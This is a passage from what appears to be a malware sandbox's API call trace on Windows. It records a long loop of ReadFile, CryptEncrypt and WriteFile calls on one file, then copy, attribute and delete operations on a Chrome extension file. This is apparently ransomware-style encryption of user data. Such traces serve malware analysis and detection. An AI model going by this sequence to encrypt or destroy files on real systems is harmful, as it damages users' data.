nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.018] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.018] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.018] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.019] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.019] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.019] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.019] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.019] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.019] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.019] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.020] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.020] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.020] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.020] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.020] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.020] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.021] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.021] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.021] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.021] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.021] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.021] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.021] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.022] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.022] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.022] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.022] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.022] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.022] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.022] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.023] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.023] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.023] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.023] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.023] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.023] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.023] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.024] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.024] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.024] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.027] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), bFailIfExists=0) returned 1 [0262.036] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css", dwFileAttributes=0x0) returned 1 [0262.037] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 